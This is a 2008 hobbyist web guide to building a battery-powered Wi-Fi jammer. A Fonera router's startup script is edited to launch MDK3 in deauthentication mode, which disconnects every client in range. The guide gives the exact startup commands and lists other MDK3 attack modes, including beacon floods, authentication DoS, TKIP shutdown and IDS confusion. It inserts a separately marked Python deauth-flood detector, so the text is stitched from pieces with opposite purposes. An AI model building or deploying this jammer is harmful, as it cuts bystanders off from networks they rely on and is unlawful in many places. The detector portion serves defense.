The "Fon Bomb" Wireless Jammer
Sunday, 06 April 2008

"Fon Bomb" Portable Wireless Jammer

This device works by deauthenticating wireless clients from their APs, which essentially turns it into a wireless jammer, since nobody can get connected.

The hardware consists of a Fonera flashed with Legend pre4.5 stable.  It also uses the battery pack listed on this website, which allows it to be mobile.  MDK3 in deauthentication mode is what actually performs the attacks on the software side.

The attack starts when the Fonera is turned on.  It automatically creates the "ath1" interface in monitor mode, then starts MDK3 in deauthentication mode as a background process.  From that point the Fonera looks for clients in range and disconnects them.  The attack ends when I turn the Fonera off, which finally allows the disconnected clients to reconnect to their APs.

Visit the forums to discuss this guide

NOTE:  This attack may not work against all wireless devices.  Also, the knowledge contained within this guide should not be used for potentially malicious acts.  Perform these actions at your own risk.


Basically, by editing the /etc/init.d/custom-user-startup file, we can pass commands for the Fonera to run at startup.   Here's what it looks like after the hack commands were added:

#!/bin/sh /etc/rc.common
START=90
wlanconfig ath1 create wlanmode monitor wlandev wifi0
mdk3 ath1 d &

# place your own startup commands here
#
# REMEMBER: You *MUST* place an '&' after launching programs you
#   that are to continue running in the background.
#
#   i.e.
#   BAD:  upnpd
#   GOOD: upnpd &
#
# Failure to do this will result in the startup process halting
# on this file and the diagnostic light remaining on (at least
# for WRT54G(s) models).


The first command creates the ath1 interface in monitor mode.  The second command tells MDK3 to start in deauthentication mode and to run in the background, designated by the "&".
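From the other side of the air interface, the behaviour described above (a burst of deauthentication / disassociation frames that keeps every client off an AP) is also what a wireless IDS looks for.  The following detector is an added example, not code from the original guide or from the MDK3 project: it parses raw 802.11 management frames captured from a monitor-mode interface (radiotap header already stripped) and alerts when one BSSID emits more deauth/disassoc frames in a short window than ordinary client churn produces.  The sample capture, the MAC addresses, the threshold of 10 frames per second and the window size are all constructed assumptions for the example.

```python
"""Offline detector for 802.11 deauthentication / disassociation floods.

Input: (timestamp_seconds, raw_frame_bytes) pairs, e.g. read from a pcap
saved off a monitor-mode interface. The frames below are constructed for
this example; they are not a real capture.
"""
import struct
from collections import defaultdict, deque

MGMT_TYPE = 0            # 802.11 frame type 0 = management
SUBTYPE_BEACON = 0x8
SUBTYPE_DISASSOC = 0xA
SUBTYPE_DEAUTH = 0xC
BROADCAST = b"\xff" * 6
BROADCAST_STR = "ff:ff:ff:ff:ff:ff"


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_mgmt_frame(frame):
    """Return header fields of an 802.11 management frame, or None.

    MAC header layout: FC(2) Duration(2) Addr1/DA(6) Addr2/SA(6)
    Addr3/BSSID(6) SeqCtl(2) = 24 bytes, followed by the frame body.
    Deauth and disassoc bodies start with a little-endian 16-bit reason code.
    """
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    if (fc0 >> 2) & 0x3 != MGMT_TYPE:      # bits 2-3 of the first FC byte = type
        return None
    subtype = (fc0 >> 4) & 0xF             # bits 4-7 = subtype
    info = {
        "subtype": subtype,
        "da": mac_str(frame[4:10]),
        "sa": mac_str(frame[10:16]),
        "bssid": mac_str(frame[16:22]),
        "reason": None,
    }
    if subtype in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC) and len(frame) >= 26:
        info["reason"] = struct.unpack_from("<H", frame, 24)[0]
    return info


def detect_deauth_flood(frames, threshold=10, window=1.0):
    """Sliding-window count of deauth/disassoc frames per BSSID.

    Emits one alert per BSSID the first time `threshold` such frames fall
    inside `window` seconds. Broadcast-addressed frames (which tear down every
    association at once) and the set of reason codes seen are reported so an
    analyst can tell a flood from normal roaming.
    """
    recent = defaultdict(deque)      # bssid -> timestamps inside the window
    broadcast_hits = defaultdict(int)
    reasons = defaultdict(set)
    alerted, alerts = set(), []
    for ts, raw in frames:
        info = parse_mgmt_frame(raw)
        if info is None or info["subtype"] not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            continue
        bssid = info["bssid"]
        q = recent[bssid]
        q.append(ts)
        while q and ts - q[0] > window:  # drop timestamps that aged out
            q.popleft()
        if info["da"] == BROADCAST_STR:
            broadcast_hits[bssid] += 1
        reasons[bssid].add(info["reason"])
        if len(q) >= threshold and bssid not in alerted:
            alerted.add(bssid)
            alerts.append({
                "bssid": bssid,
                "count_in_window": len(q),
                "broadcast_frames": broadcast_hits[bssid],
                "reason_codes": sorted(reasons[bssid]),
                "first_seen": q[0],
                "last_seen": ts,
            })
    return alerts


def build_mgmt_frame(subtype, da, sa, bssid, seq=0, body=b""):
    """Constructed test frame: FC byte0 = subtype<<4 | type<<2, flags byte 0."""
    fc = bytes([(subtype << 4) | (MGMT_TYPE << 2), 0x00])
    return fc + b"\x00\x00" + da + sa + bssid + struct.pack("<H", seq << 4) + body


def sample_capture():
    """Constructed capture: normal beacons, one legitimate client deauth
    (reason 3, station leaving), then 25 broadcast deauths (reason 7) carrying
    the AP's address within half a second."""
    ap = bytes.fromhex("02aabbcc0001")       # constructed locally-administered MACs
    client = bytes.fromhex("02aabbcc0002")
    frames = [(i * 0.1, build_mgmt_frame(SUBTYPE_BEACON, BROADCAST, ap, ap, seq=i))
              for i in range(10)]
    frames.append((0.55, build_mgmt_frame(SUBTYPE_DEAUTH, ap, client, ap,
                                          body=struct.pack("<H", 3))))
    for i in range(25):
        frames.append((1.0 + i * 0.02, build_mgmt_frame(SUBTYPE_DEAUTH, BROADCAST, ap, ap,
                                                        seq=i, body=struct.pack("<H", 7))))
    return sorted(frames, key=lambda f: f[0])


if __name__ == "__main__":
    for alert in detect_deauth_flood(sample_capture()):
        print(alert)
```

The single legitimate deauth at 0.55 s never trips the threshold on its own; the alert fires only once the burst arrives, and the report shows what distinguishes it (dozens of frames, broadcast destination, reason code 7).  On a real capture, strip the radiotap or Prism header before calling `parse_mgmt_frame`, and note that the standard mitigation is 802.11w (Protected Management Frames), under which clients discard deauth/disassoc frames that fail the integrity check rather than obeying them.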

You are not limited to this type of test.  The above is just a demonstration of what you could do.  Here are all of the available test modes:

TEST MODES:
b   - Beacon Flood Mode
      Sends beacon frames to show fake APs at clients.
      This can sometimes crash network scanners and even drivers!
a   - Authentication DoS mode
      Sends authentication frames to all APs found in range.
      Too much clients freeze or reset some APs.
p   - Basic probing and ESSID Bruteforce mode
      Probes AP and check for answer, useful for checking if SSID has
      been correctly decloaked or if AP is in your adaptors sending range
      SSID Bruteforcing is also possible with this test mode.
d   - Deauthentication / Disassociation Amok Mode
      Kicks everybody found from AP
m   - Michael shutdown exploitation (TKIP)
      Cancels all traffic continuously
x   - 802.1X tests
w   - WIDS/WIPS Confusion
      Confuse/Abuse Intrusion Detection and Prevention Systems
f   - BRAND NEW MAC FILTER BRUTEFORCE MODE
      This test uses a list of known client MAC Adresses and tries to
      authenticate them to the given AP while dynamically changing
      its response timeout for best performance. It currently works only
      on APs who deny an open authentication request properly

Run "mdk3 --fullhelp" for detailed information about each of the modes.  You can modify the command in /etc/init.d/custom-user-startup to suit whatever type of test you would like to run, and the deauthentication test accepts options to specify which APs to test against, the packet rate, and so on; "mdk3 --fullhelp" describes them.
